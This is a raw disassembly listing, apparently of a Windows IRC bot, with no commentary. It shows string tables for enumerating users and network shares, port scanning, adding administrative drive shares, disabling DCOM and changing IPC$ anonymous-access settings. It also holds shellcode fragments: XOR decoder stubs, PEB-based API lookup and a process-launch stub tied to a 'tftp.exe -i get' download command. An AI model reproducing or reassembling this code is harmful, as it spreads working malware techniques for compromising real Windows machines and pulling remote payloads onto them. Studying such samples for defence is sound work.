aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_412D95:loc_412DF9�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_412D95:loc_412DEF�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_412D95:loc_412DE5�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_412D95:loc_412DDB�o
align 4
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_412D95+3C�o
align 10h
aSSS db '%s: %s (%s)',0 ; DATA XREF: sub_412F13+EE�o
aStopped db ' Stopped',0 ; DATA XREF: sub_412F13:loc_412FE2�o
aStarting db ' Starting',0 ; DATA XREF: sub_412F13:loc_412FDB�o
aStoping db ' Stoping',0 ; DATA XREF: sub_412F13:loc_412FD4�o
aRunning_0 db ' Running',0 ; DATA XREF: sub_412F13:loc_412FCD�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_412F13:loc_412FC6�o
aPausing db ' Pausing',0 ; DATA XREF: sub_412F13:loc_412FBF�o
aPaused_0 db ' Paused',0 ; DATA XREF: sub_412F13:loc_412FB8�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_412F13+9E�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_412F13+25�o
align 4
dword_43734C dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_413053+AB�o
dd 2029206Ch, 2BBBB02h
aSNoShareSpecif db ' %s: No share specified.',0
align 4
dword_437384 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_413053+89�o
dd 2029206Ch, 2BBBB02h
aSShareS_ db ' %s share: ',27h,'%s',27h,'.',0
align 4
dword_4373B4 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_413053+57�o
dd 2029206Ch, 2BBBB02h
aSErrorWithShar db ' %s: Error with share: ',27h,'%s',27h,'. %s',0
align 4
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_413248+D0�o
align 4
aNo db 'No',0 ; DATA XREF: sub_413248+BC�o
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_413248+B5�o
dword_437414 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_413248+76�o
dd 2029206Ch, 2BBBB02h
aShareListError db ' Share list error: %s <%ld>',0
align 10h
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_413248+26�o
align 4
dword_437488 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_413369+B6�o
dd 2029206Ch, 2BBBB02h
aSNoUsernameSpe db ' %s: No username specified.',0
align 8
dword_4374C8 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_413369+94�o
dd 2029206Ch, 2BBBB02h
aSErrorWithUser db ' %s: Error with username: ',27h,'%s',27h,'. %s',0
dword_437508 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_413369+6D�o
dd 2029206Ch, 2BBBB02h
aSUsernameS_ db ' %s username: ',27h,'%s',27h,'.',0
align 4
dword_43753C dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_4134AF+394�o
dd 2029206Ch, 2BBBB02h
aUserInfoErrorL db ' User info error: <%ld>',0
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_4134AF+36A�o
align 4
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_4134AF+33F�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_4134AF+317�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_4134AF+2EC�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_4134AF+2C4�o
align 4
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_4134AF+299�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_4134AF+271�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_4134AF+246�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_4134AF+21E�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_4134AF+1F3�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_4134AF+1CB�o
align 10h
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_4134AF+1A0�o
align 10h
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_4134AF+178�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_4134AF+14D�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_4134AF+125�o
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_4134AF+D4�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_4134AF+AC�o
align 4
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_4134AF+81�o
align 4
aAccountS db 'Account: %S',0 ; DATA XREF: sub_4134AF+50�o
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_41387D+145�o
align 4
dword_4376EC dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_41387D:loc_41396A�o
dd 2029206Ch, 2BBBB02h
aAnAccessViolat db ' An access violation has occured.',0
align 4
aS_5 db ' %S',0 ; DATA XREF: sub_41387D+BA�o
align 4
dword_437734 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_41387D+7A�o
dd 2029206Ch, 2BBBB02h
aUserListErrorS db ' User list error: %s <%ld>',0
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_41387D+29�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_4139F3:loc_413B10�o
align 10h
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_4139F3:loc_413B09�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_4139F3:loc_413B02�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_4139F3:loc_413AFB�o
align 4
aAnUnknownErr_0 db 'An unknown error occurred.',0 ; DATA XREF: sub_4139F3:loc_413AF4�o
align 8
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_4139F3:loc_413AD7�o
db 'ord policy requirement.)',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_4139F3:loc_413AD0�o
align 10h
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_4139F3:loc_413AC9�o
align 8
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_4139F3+CF�o
db ' the domain.',0
align 4
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_4139F3:loc_413A9E�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_4139F3:loc_413A97�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_4139F3:loc_413A90�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_4139F3:loc_413A86�o
align 10h
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_4139F3+89�o
align 4
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_4139F3:loc_413A60�o
align 10h
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_4139F3:loc_413A56�o
align 10h
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_4139F3:loc_413A4C�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_4139F3:loc_413A42�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_4139F3:loc_413A38�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_4139F3+3B�o
align 4
dword_437A58 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_413B27+AB�o
dd 2029206Ch, 2BBBB02h
aSServerSMessag db ' %s <Server: %S> <Message: %S>',0
dword_437A94 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_413B27+81�o
dd 2029206Ch, 2BBBB02h
aMessageSentSuc db ' Message sent successfully.',0
align 10h
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_413C50+119�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_413C50+4E�o
; sub_413C50+99�o
align 10h
dword_437AF0 dd 28026502h, 62302E31h, 20282029h, 636F7270h, 2E737365h
; DATA XREF: sub_413DFD:loc_413E8A�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aProcessListFai db ' Process list failed.',0
align 4
dword_437B28 dd 28026502h, 62302E31h, 20282029h, 636F7270h, 2E737365h
; DATA XREF: sub_413DFD+86�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aProcessListCom db ' Process list completed.',0
align 4
dword_437B64 dd 28026502h, 62302E31h, 20282029h, 636F7270h, 2E737365h
; DATA XREF: sub_413DFD+19�o
dd 1F641F6Dh, 2029206Ch, 2BBBB02h
aListingProcess db ' Listing processes:',0
align 10h
dword_437BA0 dd 736E6F63h dd 74h, 0
dword_437BAC dd 1 off_437BB0 dd offset sub_413F42 ; DATA XREF: sub_414278+4A�r
aLetter db 'letter',0
align 10h
dd 2, 413FA0h, 706D6F63h, 2 dup(0)
dd 3, 413FEDh, 6E756F63h, 797274h, 0
dd 4, 41405Ch, 736Fh, 2 dup(0)
dd 5, 4140D1h
dword_437C04 dd 69257325h, 0 ; .text:0041403D�o ...
dword_437C0C dd 4350h dword_437C10 dd 7C7325h dword_437C14 dd 5D73255Bh, 7Chdword_437C1C dd 334B32h dword_437C20 dd 5D64255Bh, 7325hdword_437C28 dd 5D4D5Bh ; sub_4141DB+51�o
unk_437C2C db 2 ; DATA XREF: sub_4142E2+92�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSPortDIsOp_0 db ' IP: %s Port: %d is open.',0
unk_437C68 db 2 ; DATA XREF: sub_4143AF+41�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aScanningIpSPor db ' Scanning IP: %s, Port: %d.',0
align 4
off_437CA8 dd offset dword_437CE0 ; DATA XREF: sub_414500:loc_4146B5�r
; sub_414500+1C3�r ...
dword_437CAC dd 0 dd offset dword_437CD8
align 8
dd offset dword_437CD4
dd offset dword_437CD0
dd offset dword_437CCC
dd offset dword_437CC8
dword_437CC8 dd 5C3A44h dword_437CCC dd 2444h dword_437CD0 dd 5C3A43h dword_437CD4 dd 2443h dword_437CD8 dd 494D4441h, 244Ehdword_437CE0 dd 24435049h, 0 unk_437CE8 db 2 ; DATA XREF: sub_414500+2E7�o
; sub_414826+2DD�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aNetapi32_dllCo db ' Netapi32.dll couldn',27h,'t be loaded.',0
align 4
unk_437D2C db 2 ; DATA XREF: sub_414500+2D1�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aNetworkSharesD db ' Network shares deleted.',0
align 4
unk_437D68 db 2 ; DATA XREF: sub_414500:loc_41476A�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToDelete db ' Failed to delete ',27h,'%S',27h,' share.',0
align 4
unk_437DA8 db 2 ; DATA XREF: sub_414500+263�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aShareSDeleted_ db ' Share ',27h,'%S',27h,' deleted.',0
align 10h
unk_437DE0 db 2 ; DATA XREF: sub_414500:loc_4146DA�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToDele_0 db ' Failed to delete ',27h,'%s',27h,' share.',0
align 10h
unk_437E20 db 2 ; DATA XREF: sub_414500+1D3�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aShareSDelete_0 db ' Share ',27h,'%s',27h,' deleted.',0
align 4
unk_437E58 db 2 ; DATA XREF: sub_414500:loc_414632�o
; sub_414826:loc_414954�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aAdvapi32_dllCo db ' Advapi32.dll couldn',27h,'t be loaded.',0
align 10h
unk_437EA0 db 2 ; DATA XREF: sub_414500:loc_41462B�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToOpenIp db ' Failed to open IPC$ Restriction registry key.',0
align 10h
unk_437EF0 db 2 ; DATA XREF: sub_414500:loc_414613�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aRestrictedAcce db ' Restricted access to the IPC$ Share.',0
align 4
unk_437F38 db 2 ; DATA XREF: sub_414500+10C�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToRestri db ' Failed to restrict access to the IPC$ Share.',0
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_414500+ED�o
; sub_414826+ED�o
align 10h
unk_437FA0 db 2 ; DATA XREF: sub_414500+91�o
; sub_414826+91�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToOpenDc db ' Failed to open DCOM registry key.',0
align 4
dword_437FE4 dd 28026502h, 62302E31h, 20282029h, 75636573h, 6D2E6572h
; DATA XREF: sub_414500:loc_414573�o
dd 6C1F641Fh, 2202920h, 2002BBBBh, 4F434420h, 6964204Dh
dd 6C626173h, 2E6465h
unk_438014 db 2 ; DATA XREF: sub_414500+6C�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aDisableDcomFai db ' Disable DCOM failed.',0
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_414500+54�o
; sub_414826+54�o
align 4
word_438058 dw 4Eh ; DATA XREF: sub_414500+38�r
align 4
unk_43805C db 2 ; DATA XREF: sub_414826+2C5�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aNetworkSharesA db ' Network shares added.',0
align 4
aC_2 db '%c:\',0 ; DATA XREF: sub_414826+22F�o
align 4
aC_3 db '%c$',0 ; DATA XREF: sub_414826+21E�o
unk_4380A0 db 2 ; DATA XREF: sub_414826:loc_4149D3�o
; sub_414826:loc_414A9E�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToAddSSh db ' Failed to add ',27h,'%s',27h,' share.',0
align 4
unk_4380DC db 2 ; DATA XREF: sub_414826+1A6�o
; sub_414826+271�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aShareSAdded_ db ' Share ',27h,'%s',27h,' added.',0
align 10h
unk_438110 db 2 ; DATA XREF: sub_414826:loc_41494D�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToOpen_0 db ' Failed to open IPC$ restriction registry key.',0
align 10h
unk_438160 db 2 ; DATA XREF: sub_414826:loc_414935�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aUnrestrictedAc db ' Unrestricted access to the IPC$ Share.',0
unk_4381A8 db 2 ; DATA XREF: sub_414826+108�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToUnrest db ' Failed to unrestrict access to the IPC$ Share.',0
dword_4381F8 dd 28026502h, 62302E31h, 20282029h, 75636573h, 6D2E6572h
; DATA XREF: sub_414826:loc_414899�o
dd 6C1F641Fh, 2202920h, 2002BBBBh, 4F434420h, 6E65204Dh
dd 656C6261h, 2E64h
unk_438228 db 2 ; DATA XREF: sub_414826+6C�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 65h, 63h, 75h
db 72h ; r
db 65h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aEnableDcomFail db ' Enable DCOM failed.',0
align 10h
word_438260 dw 59h ; DATA XREF: sub_414826+38�r
align 8
loc_438268: ; DATA XREF: sub_414CD9+BE�o
jmp short loc_43826C
; ---------------------------------------------------------------------------
loc_43826A: ; CODE XREF: .text:loc_43826C�p
jmp short loc_438271
; ---------------------------------------------------------------------------
loc_43826C: ; CODE XREF: .text:loc_438268�j
call loc_43826A
loc_438271: ; CODE XREF: .text:loc_43826A�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 66h, 0B9h
word_438276 dw 0FFFFh ; DATA XREF: sub_414CD9+C6�w
db 80h, 73h, 0Eh
byte_43827B db 0FFh ; DATA XREF: sub_414CD9+CD�w
dd 0F9E243h
; ---------------------------------------------------------------------------
loc_438280: ; DATA XREF: sub_414CD9+9C�o
jmp short loc_438284
; ---------------------------------------------------------------------------
loc_438282: ; CODE XREF: .text:loc_438284�p
jmp short loc_438289
; ---------------------------------------------------------------------------
loc_438284: ; CODE XREF: .text:loc_438280�j
call loc_438282
loc_438289: ; CODE XREF: .text:loc_438282�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 0B1h
byte_43828D db 0FFh ; DATA XREF: sub_414CD9+A4�w
dw 7380h
db 0Ch
byte_438291 db 0FFh ; DATA XREF: sub_414CD9+AA�w
dw 0E243h
dd 0F9h
dword_438298 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_414B62+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_4382FC dd 12h aTftp_exeIGet db 'tftp.exe -i get ',0 ; DATA XREF: sub_414B62+79�o
aJ_0 db 'j',0
db 0E8h
dword_438315 dd 17h ; ---------------------------------------------------------------------------
jnz short near ptr byte_43831C
retn
; ---------------------------------------------------------------------------
byte_43831C db 0E8h ; CODE XREF: .text:00438319�j
dword_43831D dd 1 byte_438321 db 0, 6Ah, 0 ; DATA XREF: sub_414B62+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_43832B dd 0FFFFFFEDh ; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi
add esp, 54h
test eax, eax
retn
; ---------------------------------------------------------------------------
align 4
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_414E97+10�o
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_415062+51�o
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_415062+35�o
dword_4383AC dd 29E2C0h dword_4383B0 dd 173Fh dd 9875h, 9873h
off_4383BC dd offset sub_415DD3 ; DATA XREF: sub_41781A�r
dd offset nullsub_2
dd offset nullsub_2
dword_4383C8 dd 1B3Fh dword_4383CC dd 19930520h, 417C03h, 0FFFFFFFFh, 12FFC0h, 0 ; sub_4162D6+2�o
off_4383E0 dd offset sub_417858 ; DATA XREF: sub_417C0E+1C�r
dword_4383E4 dd 2 ; sub_41D7B5+46�r ...
off_4383E8 dd offset aNull_0 ; DATA XREF: sub_417D6C:loc_4180D0�r
; sub_417D6C+457�r
; "(null)"
off_4383EC dd offset aNull ; DATA XREF: sub_417D6C+259�r
; "(null)"
off_4383F0 dd offset word_4383FA ; DATA XREF: sub_4157F4+23�r
; sub_4157F4:loc_415855�r ...
dd offset word_4383FA
db 2 dup(0)
word_4383FA dw 20h ; DATA XREF: sub_41EF5D+18�r
; .text:off_4383F0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_4385FC dd 1 ; sub_4157F4:loc_415840�r ...
byte_438600 db 2Eh ; DATA XREF: sub_41A7A3:loc_41A7E3�r
; sub_41A7FD+4�r ...
align 4
dd 1, 10h, 0
off_438610 dd offset off_438610 ; DATA XREF: sub_4197BC+D�o
; sub_4197BC+69�o ...
off_438614 dd offset off_438610 ; DATA XREF: sub_4197BC:loc_41983C�r
; sub_4197BC+89�w ...
dd offset dword_438628
dd offset dword_438628
dword_438620 dd 0FFFFFFFFh ; sub_419900:loc_41994D�w
dd 0FFFFFFFFh
dword_438628 dd 0F0h, 0F1h, 800h dup(0) ; .text:0043861C�o
off_43A630 dd offset off_438610 ; DATA XREF: sub_419900+15�r
; sub_419900+20�w ...
dword_43A634 dd 1E0h ; sub_41737F+185�r ...
dword_43A638 dd 14h off_43A63C dd offset aExp ; DATA XREF: sub_41A4EC:loc_41A509�r
; "exp"
dd 1Dh, 4217D4h, 1Ah, 4217D0h, 1Bh, 4217C8h, 1Fh, 4217C0h
dd 13h, 4217B8h, 21h, 4217B0h, 0Eh, 4217A8h, 0Dh, 4217A0h
dd 0Fh, 421798h, 10h, 421790h, 5, 421788h, 1Eh, 421784h
dd 12h, 421780h, 20h, 42177Ch, 0Ch, 421774h, 0Bh, 42176Ch
dd 15h, 421764h, 1Ch, 42175Ch, 19h, 421754h, 11h, 42174Ch
dd 18h, 421744h, 16h, 42173Ch, 17h, 421734h, 22h, 421730h
dd 23h, 42172Ch, 24h, 421728h
dbl_43A710 dq 1.797693134862316e308 ; DATA XREF: sub_41A227+B7�r
; sub_41A227:loc_41A30E�r ...
dd 0
dd 0FFF80000h
dbl_43A720 dq 1.797693134862316e308 ; DATA XREF: sub_41A227+92�r
; sub_41A227:loc_41A2E6�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_43A738 dt 2.3562723457267347066e313 ; DATA XREF: sub_41A6D4+D�r
; sub_41A6D4+1F�r
align 4
tbyte_43A744 dt 1.9149954921904370718e-1233 ; DATA XREF: sub_41A6D4+31�r
align 10h
off_43A750 dd offset sub_41AB68 ; DATA XREF: sub_415DEB+F�w
; sub_417D6C+3AA�r
off_43A754 dd offset sub_41A7FD ; DATA XREF: sub_415DEB+5�w
; sub_417D6C+3E2�r
off_43A758 dd offset sub_41A863 ; DATA XREF: sub_415DEB+14�w
; sub_41B605+430�r
off_43A75C dd offset sub_41A7A3 ; DATA XREF: sub_415DEB+1E�w
; sub_417D6C+3CB�r
off_43A760 dd offset sub_41A84B ; DATA XREF: sub_415DEB+28�w
off_43A764 dd offset sub_41AB68 ; DATA XREF: sub_415DEB+32�w
dd offset sub_41E79E
align 10h
dd offset sub_41B42C
off_43A774 dd offset sub_41B42C ; DATA XREF: sub_41B482+29�r
dword_43A778 dd 0D2D0920h, 5Dhdword_43A780 dd 5Dh, 0 byte_43A788 db 1 ; DATA XREF: sub_41C85D+E1�r
db 2, 4, 8
align 10h
dword_43A790 dd 3A4h dword_43A794 dd 82798260h, 21h, 0dword_43A7A0 dd 0DFA6h align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_43A880 dd 1 ; sub_41CE74+C�o
dword_43A884 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
